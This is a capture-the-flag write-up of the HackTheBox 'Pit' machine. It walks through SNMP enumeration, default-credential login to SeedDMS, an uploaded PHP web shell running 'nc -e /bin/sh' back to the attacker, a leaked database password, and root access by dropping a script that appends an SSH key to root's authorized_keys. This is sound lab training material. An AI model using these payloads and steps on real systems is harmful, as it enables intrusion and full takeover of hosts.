Pit - [HTB]

Cover Image for Pit - [HTB]
Marmeus
Marmeus

Table of Contents

    Introduction

    Pit is a medium-hard CentOs machine from HackTheBox where the attacker will have to enumerate through an SNMP service finding a new web application for an RCE. Later, he or she will have to use the information from the SNMP service to find a vulnerable script which allow the attacker to retrieve the root flag.

    Enumeration

    As always, let's start finding all opened ports in the machine, but this time we will also need enumerate the UDP openend ports.

    kali@kali:~/Documents/HTB/PIT$ sudo nmap -sS -p- -n -T4 10.10.10.241 -oN AllPorts.txt
    Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-15 22:31 CEST
    Nmap scan report for 10.10.10.241
    Host is up (0.087s latency).
    Not shown: 65532 filtered ports
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    9090/tcp open  zeus-admin
    
    kali@kali:~/Documents/HTB/PIT$ sudo nmap -sU -n 10.10.10.241
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-17 16:52 EDT
    Host is up (0.049s latency).
    PORT    STATE         SERVICE
    161/udp open|filtered snmp

    There are four openend ports, let's continue with a deeper scan.

    kali@kali:~/Documents/HTB/PIT$ sudo nmap -sC -sV -p22,80,9090 -n -oN DepthPorts.txt 10.10.10.241
    Nmap scan report for 10.10.10.241
    Host is up (0.12s latency).
    
    PORT     STATE SERVICE         VERSION
    22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
    | ssh-hostkey: 
    |   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
    |   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
    |_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
    80/tcp   open  http            nginx 1.14.1
    |_http-server-header: nginx/1.14.1
    |_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
    161/tcp  filtered snmp 
    9090/tcp open  ssl/zeus-admin?
    [...]
    | ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
    | Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
    | Not valid before: 2020-04-16T23:29:12
    |_Not valid after:  2030-06-04T16:09:12
    |_ssl-date: TLS randomness does not represent time
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port9090-TCP:V=7.91%T=SSL%I=7%D=5/15%Time=60A01CC6%P=x86_64-pc-linux-gn
    [...]
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Sat May 15 15:13:12 2021 -- 1 IP address (1 host up) scanned in 197.40 seconds
    
    kali@kali:~/Documents/HTB/PIT$ sudo nmap -sU -sC -sV -p 161 -oN output.txt 10.10.10.241
    Nmap scan report for 10.10.10.241
    Host is up (0.060s latency).
    
    PORT    STATE SERVICE VERSION
    161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
    | snmp-info: 
    |   enterprise: net-snmp
    |   engineIDFormat: unknown
    |   engineIDData: 4ca7e41263c5985e00000000
    |   snmpEngineBoots: 73
    |_  snmpEngineTime: 18m24s
    | snmp-processes: 
    |   1: 
    |     Name: systemd
    |     Path: /usr/lib/systemd/systemd
    |     Params: --switched-root --system --deserialize 18
    [...]
    |_    Params: -s
    | snmp-sysdescr: Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
    |_  System uptime: 18m24.10s (110410 timeticks)
    Service Info: Host: pit.htb
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

    Thanks to nmap we obtain two domains pit.htb and dms-pit.htb

    After a ton of enumeration on each service, finally enumerating the the private enterpise numbers of the SNMP service wer can find a web directory and some usernames.

    Note: Posts about SNMP enumeration.

    kali@kali:~/Documents/HTB/PIT$ snmpwalk -c public pit.htb -v 1 enterprise
    [...]
    UCD-SNMP-MIB::dskPath.2 = STRING: /var/www/html/seeddms51x/seeddms
    [...]
    NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
    NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
    NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING:
    NET-SNMP-EXTEND-MIB::nsExtendInput."monitoring" = STRING: 
    [...]
    NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".25 = STRING: Login Name           SELinux User         MLS/MCS Range        Service            
    NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".26 = STRING:          
    NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".27 = STRING: __default__          unconfined_u         s0-s0:c0.c1023       *                  
    NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".28 = STRING: michelle             user_u               s0                   *                  
    NET-SNMP-EXTEND-MIB::nsExtendOutLine."monitoring".29 = STRING: root                 unconfined_u         s0-s0:c0.c1023       *    

    In order to access to the web page we can do it through this URL. However, we need some credentials

    SeedDMS login

    It turns out that the credentials for the login page are michelle:michelle.

    Explotation

    Looking at the "Upgrade Note" we can figure it out that they are using a SeedDMS v5.1.15.

    SeedDMS version

    This version has an exploit associated it, allowing us to execute commands on the machine. Nonetheless, we need to do it manually.

    kali@kali:~/Documents/HTB/PIT$ gedit NmapSnmp.txt 
    kali@kali:~/Documents/HTB/PIT$ searchsploit seeddms
    ---------------------------------------------------------------- ---------------------------------
     Exploit Title                                                   |  Path
    ---------------------------------------------------------------- ---------------------------------
    SeedDMS 5.1.18 - Persistent Cross-Site Scripting                | php/webapps/48324.txt
    SeedDMS < 5.1.11 - 'out.GroupMgr.php' Cross-Site Scripting      | php/webapps/47024.txt
    SeedDMS < 5.1.11 - 'out.UsrMgr.php' Cross-Site Scripting        | php/webapps/47023.txt
    SeedDMS versions < 5.1.11 - Remote Command Execution            | php/webapps/47022.txt
    ---------------------------------------------------------------- ---------------------------------
    Shellcodes: No Results
    Papers: No Results
    

    Accesding to DMS/Docs/Users/Michelle/ we can a "Add Document" to the server. In my case the file was the following.

    Note: After 5 minutes every file is deleted so you will have to uploaded it several times.

    kali@kali:~/Documents/HTB/PIT$ cat shell.php
    <?php shell_exec("nc -e /bin/sh <iP> 4444");?>

    Now, we need to figure out the documentid of our file, as you can see in the following image.

    SeedDMS documentID

    After that, we can access the file with the following URL, obtaining our reverse shell.

    http://dms-pit.htb/seeddms51x/data/1048576/<DocumentID>/1.php

    Inside the file /var/www/html/seeddms51x/conf/settings.xml there are the credentials for the database which passsword can be used for getting access as michelle to the <strong data-reactroot="">Cockpit</strong> web page at port 9090.

    <database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
    Cockpit web page

    Using the terminal we can obtain the user flag.

    Privilege escalation

    Looking once again in the snmpwalk service we can see a weird file.

    kali@kali:~/Documents/HTB/PIT$ snmpwalk -v 1 -c public pit.htb enterprise 
    [...]
    UCD-SNMP-MIB::dskErrorFlag.2 = INTEGER: error(1)
    NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
    NET-SNMP-EXTEND-MIB::nsExtendCommand."monitoring" = STRING: /usr/bin/monitor
    NET-SNMP-EXTEND-MIB::nsExtendArgs."monitoring" = STRING: 
    NET-SNMP-EXTEND-MIB::nsExtendInput."monitoring" = STRING: 

    Looking its contents we can seee that executes every file named check+<whatever>+sh stored at /usr/local/monitoring/.

    [michelle@pit ~]$ cat /usr/bin/monitor
    #!/bin/bash
    
    for script in /usr/local/monitoring/check*sh
    do
        /bin/bash $script
    done
    

    In order to obtain a shell as root we have to appent our pub SSH key into the /root/.ssh/authorized_keys. To do so you can execute the following command.

    [michelle@pit ~]$ echo -e "mkdir /root/.ssh/; echo '<Your Pub ssh key>' >> /root/.ssh/authorized_keys" > /usr/local/monitoring/check.sh

    Finally, in order to execute the monitor file we only need to execute the snmpwalk command one final time and access to the machine through SSH as root.

    kali@kali:~/Documents/HTB/PIT$ snmpwalk -v 1 -c public pit.htb enterprise
    [...]
    kali@kali:~/Documents/HTB/PIT$ ssh root@pit.htb
    Web console: https://pit.htb:9090/      
    Last login: Mon May 17 16:33:43 2021 from 10.10.14.56
    [root@pit ~]# cat root.txt
    [...]